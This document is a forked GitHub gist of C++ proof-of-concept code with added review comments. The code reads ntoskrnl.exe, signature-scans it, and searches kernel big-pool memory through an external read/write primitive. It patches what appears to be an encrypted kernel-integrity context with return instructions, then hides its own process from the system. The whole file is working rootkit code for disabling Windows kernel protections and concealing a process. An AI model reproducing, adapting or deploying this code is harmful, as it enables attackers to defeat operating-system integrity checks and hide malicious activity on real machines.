gmh5225/a.c Secret

Forked from waryas/a.c
Created July 18, 2022 11:42
#include "Base.hpp"
// Function-pointer alias for a DbgPrint-style routine. Declared but not
// referenced anywhere in this file.
using DbgPrint = ULONG(*)(char* Format);

// One record of the SystemBigPoolInformation result set. The first union
// overlays the allocation's virtual address with a one-bit NonPaged flag,
// so the low bit of VirtualAddress doubles as that flag and is not a
// clean address bit.
struct _SYSTEM_BIGPOOL_ENTRY
{
    union {
        PVOID VirtualAddress;
        ULONG_PTR NonPaged : 1;
    };
    ULONG_PTR SizeInBytes;
    union {
        UCHAR Tag[4];
        ULONG TagUlong;
    };
};
using SYSTEM_BIGPOOL_ENTRY = _SYSTEM_BIGPOOL_ENTRY;
using PSYSTEM_BIGPOOL_ENTRY = _SYSTEM_BIGPOOL_ENTRY*;

//from http://www.geoffchappell.com/studies/windows/km/ntoskrnl/api/ex/sysinfo/bigpool.htm
// Header of the SystemBigPoolInformation buffer: Count entries follow
// inline in AllocatedInfo (ANYSIZE_ARRAY flexible-array idiom).
struct _SYSTEM_BIGPOOL_INFORMATION {
    ULONG Count;
    SYSTEM_BIGPOOL_ENTRY AllocatedInfo[ANYSIZE_ARRAY];
};
using SYSTEM_BIGPOOL_INFORMATION = _SYSTEM_BIGPOOL_INFORMATION;
using PSYSTEM_BIGPOOL_INFORMATION = _SYSTEM_BIGPOOL_INFORMATION*;

// Prototype of ntdll!NtQuerySystemInformation; main() resolves it at
// runtime with GetProcAddress rather than importing it statically.
using PNtQuerySystemInformation = NTSTATUS(WINAPI*)(
    __in SYSTEM_INFORMATION_CLASS SystemInformationClass,
    __inout PVOID SystemInformation,
    __in ULONG SystemInformationLength,
    __out_opt PULONG ReturnLength
);
// Entry point of a proof-of-concept that tampers with kernel-mode memory through
// an external read/write primitive (InitializeBypass, GetProcessMemory, GetEProcess
// and Kernel come from Base.hpp and are not visible in this file) and then hides
// its own process.
//
// Observable behaviour, in order: opens the on-disk ntoskrnl.exe image, scans it
// for a fixed 35-byte signature, takes four 8-byte values from that location,
// enumerates large pool allocations with NtQuerySystemInformation(
// SystemBigPoolInformation), reads the same four offsets from every allocation
// through the primitive, overwrites 16 bytes wherever the XOR comparison below
// matches, calls Kernel::HideProcess and then sleeps forever. Each of those steps
// is a distinct signal for endpoint telemetry: a user-mode process opening the
// kernel image, the big-pool query, and the dependency on whatever kernel
// component the primitive wraps.
//
// Review notes (the code is left as written): fopen, fread and GlobalAlloc results
// are unchecked; the ntos and info buffers are never freed; the signature scan and
// the k1..k4 reads can run past the end of the ntos buffer; the per-allocation
// scan reads up to 0x810 bytes beyond each allocation's reported size.
int main()
{
// Obtain the external memory-access primitive. pid 4 is conventionally the System
// process; `system` is requested but never used below.
auto pmem = InitializeBypass();
auto system = pmem->GetProcessMemory(4);
Kernel kernel(pmem);
auto pid = GetCurrentProcessId();
auto process = pmem->GetProcessMemory(pid);
auto eprocess = pmem->GetEProcess(pid);
// Read the whole on-disk kernel image into a heap buffer.
// NOTE(review): `f` is not checked for NULL before _fseeki64, the fread return
// value is ignored, and `ntos` is never deleted.
FILE* f = fopen("C:\\Windows\\system32\\ntoskrnl.exe", "rb");
printf("%d\n", GetLastError());
_fseeki64(f, 0, SEEK_END);
uint64_t size = _ftelli64(f);
_fseeki64(f, 0, SEEK_SET);
auto ntos = new uint8_t[size];
fread((char*)ntos, size, 1, f);
fclose(f);
// 35-byte pattern searched for in the image. The mask is all 'x' (no '?'
// wildcards), so the wildcard branch in the scan is never taken.
uint8_t sig[] = {
0x48 ,0x8B ,0xC4 ,0x48 ,0x89 ,
0x58 ,0x08 ,0x48 ,0x89 ,0x70 ,
0x18 ,0x48 ,0x89 ,0x78 ,0x20 ,
0x48 ,0x89 ,0x50 ,0x10 ,0x55 ,
0x41 ,0x54 ,0x41 ,0x55 ,0x41 ,
0x56 ,0x41 ,0x57 ,0x48 ,0x81 ,
0xEC ,0xC0 ,0x02 ,0x00 ,0x00 };
uint8_t mask[] = "xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx";
// Linear signature scan. NOTE(review): cursor runs up to and including size, and
// ntos[cursor + position] is never bounded by size, so the tail of the buffer is
// read past its end. A match only breaks the inner loop, so pg ends up as the
// LAST match; if nothing matches pg stays 0 and the reads below use offset 0
// without any error.
uint64_t pg = 0;
for (uint64_t cursor = 0; cursor <= size; cursor++)
{
for (uint64_t position = 0; position < sizeof(sig);)
{
if (mask[position] != '?' && ntos[cursor + position] != sig[position])
break;
else
position++;
if (position == sizeof(sig))
{
pg = cursor; break;
}
}
}
// Four 8-byte reference values at pg, pg+8, pg+0x800 and pg+0x808; the same four
// offsets are read from each pool allocation below. pg + 0x810 <= size is assumed
// but not checked.
uint64_t k1 = *(uint64_t*)(&ntos[pg+000]);
uint64_t k2 = *(uint64_t*)(&ntos[pg + 0x008]);
uint64_t k3 = *(uint64_t*)(&ntos[pg + 0x800]);
uint64_t k4 = *(uint64_t*)(&ntos[pg + 0x808]);
// Resolve NtQuerySystemInformation at runtime (keeps it out of the import table).
HMODULE ntdll = GetModuleHandle(TEXT("ntdll"));
PNtQuerySystemInformation query = (PNtQuerySystemInformation)GetProcAddress(ntdll, "NtQuerySystemInformation");
if (query == NULL) {
printf("GetProcAddress() failed.\n");
return 1;
}
// Grow the result buffer until the call stops returning 0xC0000004
// (STATUS_INFO_LENGTH_MISMATCH). NOTE(review): every iteration allocates a fresh
// block and the previous one is never freed; a NULL return from GlobalAlloc is
// not checked before being passed to the call.
unsigned int len = sizeof(SYSTEM_BIGPOOL_INFORMATION);
unsigned long out;
PSYSTEM_BIGPOOL_INFORMATION info = NULL;
NTSTATUS status = ERROR;
do {
len *= 2;
info = (PSYSTEM_BIGPOOL_INFORMATION)GlobalAlloc(GMEM_ZEROINIT, len);
status = query(SystemBigPoolInformation, info, len, &out);
} while (status == (NTSTATUS)0xc0000004);
// SUCCEEDED() is the HRESULT macro; it tests the sign bit, which is also how
// NT_SUCCESS is defined, so this works on an NTSTATUS but reads oddly.
if (!SUCCEEDED(status)) {
printf("NtQuerySystemInformation failed with error code 0x%X\n", status);
return 1;
}
// Walk every reported large-pool allocation of at least one page.
for (unsigned int j = 0; j < info->Count; j++) {
SYSTEM_BIGPOOL_ENTRY poolEntry = info->AllocatedInfo[j];
if (poolEntry.SizeInBytes >= 0x1000) {
// NOTE(review): this `len` shadows the outer one and narrows SizeInBytes
// (ULONG_PTR) to unsigned int. The low bit of VirtualAddress is overlaid with
// the NonPaged flag in the struct definition and is not masked off before the
// address arithmetic below — confirm whether the Read primitive tolerates that.
unsigned int len = poolEntry.SizeInBytes;
unsigned int room = len;
unsigned int i = 0;
// `room` starts at len and decrements in step with i, so every byte offset
// 0..len-1 is visited, and each step reads 8 bytes at i + 0x808 — up to 0x810
// bytes past the allocation's reported end. What Read<uint8_t> returns is not
// visible here; it is null-checked, then cast to uint64_t* and dereferenced.
while (room) {
auto asm1 = (uint64_t*)process->Read<uint8_t>((void*)((uint64_t)poolEntry.VirtualAddress + i));
auto asm2 = (uint64_t*)process->Read<uint8_t>((void*)((uint64_t)poolEntry.VirtualAddress + i + 0x8));
auto asm3 = (uint64_t*)process->Read<uint8_t>((void*)((uint64_t)poolEntry.VirtualAddress + i + 0x800));
auto asm4 = (uint64_t*)process->Read<uint8_t>((void*)((uint64_t)poolEntry.VirtualAddress + i + 0x808));
if (asm1 && asm2 && asm3 && asm4) {
// Match when the values at +0/+0x800 and +8/+0x808 XOR with k1..k4 to the same
// pair; key1/key2 are those XOR results.
if ((*asm1 ^ k1) == (*asm3 ^ k3)
&& (*asm2 ^ k2) == (*asm4 ^ k4))
{
auto key1 = (*asm1 ^ k1);
auto key2 = (*asm2 ^ k2);
// Two 8-byte constants, masked with key1/key2, written back at +0 and +8 of
// the match. The scan continues after a write; it does not stop at the first hit.
unsigned char patch[16] = { 0 };
*(uint64_t*)&patch[0] = 0x5500000100828348LL ^ key1;
*(uint64_t*)&patch[8] = 0x90909090c3d08948LL ^ key2;
process->Write<uint64_t>((void*)((uint64_t)poolEntry.VirtualAddress + i), (uint64_t*)&patch[0]);
process->Write<uint64_t>((void*)((uint64_t)poolEntry.VirtualAddress + i + 0x8), (uint64_t*)&patch[8]);
printf("Patched context\n");
}
}
else {
// Empty branch: a failed read is silently skipped.
}
i++;
room--;
}
}
}
// Hide this process via the external primitive, then spin forever. The message
// below states that process exit bug-checks the machine; the final printf is
// unreachable.
kernel.HideProcess(eprocess);
printf("Process hidden, exit will bsod but this can run forever!\n");
while (1)
Sleep(1000);
printf("Press any key to exit\n");
}